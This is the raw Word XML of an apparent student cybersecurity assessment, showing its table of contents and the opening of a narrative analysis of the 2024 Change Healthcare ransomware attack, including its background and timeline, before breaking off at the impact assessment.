          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00644AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Task 1: Strategic Threat Analysis - Change Healthcare Ransomware Attack (2024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 2.1 Background and Context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 2.2 Attack Timeline and Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 2.3 MITRE ATT&amp;CK TTP Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 2.4 Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 2.5 Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Task 2: Red Team Engagement - Operation IP Shield</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.1 Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.2 Threat Emulation Plan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.3 Lab Environment Design</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.4 Attack Narrative and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.5 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.6 Technical Report for Blue Team</w:t>
      </w:r>
      <w:r w:rsidR="00AA2597" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.7 Executive Brief</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   - 3.8 Cost-Benefit Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00D95" w:rsidRPr="00C57BFC" w:rsidRDefault="00D00D95" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237BB6" w:rsidRPr="00C57BFC" w:rsidRDefault="00237BB6" w:rsidP="00D00D95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0033774F" w:rsidRPr="00C57BFC" w:rsidRDefault="004031B7" w:rsidP="0033774F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033774F" w:rsidRPr="00C57BFC" w:rsidRDefault="0033774F" w:rsidP="0033774F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Healthcare and pharmaceutical sectors face escalating cyber threats, with protected health information valued at $363 per record versus $1-2 for credit cards [1]. Ransomware attacks increased 30% in 2025, with 423 incidents recorded [2]. This assessment examines offensive security through: (1) retrospective analysis of the Change Healthcare breach affecting one-third of Americans and costing $2.87B [3], and (2) prospective red team simulation demonstrating realistic APT compromise of pharmaceutical infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033774F" w:rsidRPr="00C57BFC" w:rsidRDefault="0033774F" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA2B7E" w:rsidRPr="00C57BFC" w:rsidRDefault="00BA2B7E" w:rsidP="00BA2B7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. TASK 1: STRATEGIC THREAT ANALYSIS - CHANGE HEALTHCARE ATTACK (2024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>Change Healthcare, a UnitedHealth subsidiary, stands as the largest U.S. healthcare payment processor, handling an extraordinary 15 billion transactions every year [4]. To put this in perspective, this organization essentially serves as the financial nervous system of American healthcare, processing roughly one-third of all U.S. patient records and facilitating the money flow between thousands of hospitals, clinics, pharmacies, and insurance companies. When you visit your doctor or pick up a prescription, there's a good chance Change Healthcare is working behind the scenes to make that transaction happen. This critical role makes it invaluable to healthcare operations, but it also painted a massive target on the company's back for sophisticated cybercriminals.</w:t>
      </w:r>
      <w:r w:rsidR="002008C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>On February 21, 2024, that target was hit. A ransomware campaign attributed to ALPHV/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BlackCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> struck UnitedHealth's Change Healthcare unit, deploying encryption across key systems [5]. What made this attack particularly devastating wasn't some Hollywood-style hack using exotic zero-day exploits. Instead, the attackers simply walked through the front door using stolen credentials to access a Citrix remote access portal that lacked multifactor authentication (MFA) [6]. Think about that for a moment: a simple username and password was all it took to breach one of America's most critical healthcare infrastructure providers. Once inside, the threat actors spent nine days carefully moving through the network, stealing data before finally pulling the trigger on their ransomware [7].</w:t>
      </w:r>
      <w:r w:rsidR="002008C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The numbers are staggering. Approximately 6 TB of protected health information (PHI) was stolen, impacting 192.7 million people</w:t>
      </w:r>
      <w:r w:rsidR="002008C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that's more than half the U.S. population, and 145% larger than the previously record-breaking 2015 Anthem breach [8]. The stolen data wasn't just names and addresses. It included complete medical records, diagnostic test results, prescription information, insurance details, and financial data [4]. This wasn't just a technical failure; it was a catastrophic betrayal of patient privacy on an unprecedented scale.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Attack Timeline and Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>February 21, 2024</w:t>
      </w:r>
      <w:r>
        <w:t>: The ransomware attack hits Change Healthcare systems, and suddenly the platform goes completely dark [9]. Imagine waking up to find that the digital infrastructure connecting America's healthcare system had just vanished overnight. The timing suggests the ALPHV/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BlackCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> group had been watching, waiting, and planning for this moment during their nine-day reconnaissance mission inside the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Immediately after</w:t>
      </w:r>
      <w:r>
        <w:t>: Chaos. The entire U.S. healthcare system feels the shockwaves as insurance claims can no longer be processed electronically [9]. Hospitals can't verify insurance coverage. Pharmacies struggle to fill prescriptions. Healthcare providers can't confirm whether they'll get paid for services. For many healthcare organizations, especially smaller practices, the cash flow problems become acute almost immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>The following months</w:t>
      </w:r>
      <w:r>
        <w:t>: Healthcare providers across America are forced to dust off their fax machines and dig out paper forms, reverting to manual billing methods that haven't been the norm in decades [9]. Recovery efforts begin, but untangling the mess proves extraordinarily complex. The healthcare paymen</w:t>
      </w:r>
      <w:r w:rsidR="002008C5">
        <w:t xml:space="preserve">t system isn't just complicated </w:t>
      </w:r>
      <w:r>
        <w:t>it's a web of interconnected dependencies where everything affects everything else. Some smaller practices report difficulties making payroll, with staff wondering if their jobs are secure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>November 2024</w:t>
      </w:r>
      <w:r>
        <w:t>: After nine grueling months, the Change Healthcare clearing service finally resumes full operations [9]. But this milestone only tells part of the story.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Even after November 2024</w:t>
      </w:r>
      <w:r>
        <w:t>: Some systems remain only "partially available," and the company continues publishing updates about ongoing restoration work [9]. Nearly a year later, they're still picking up the pieces. This extended recovery timeline reveals just how profound the damage was and how complex these systems really are.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083712D" w:rsidRDefault="0083712D" w:rsidP="0083712D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
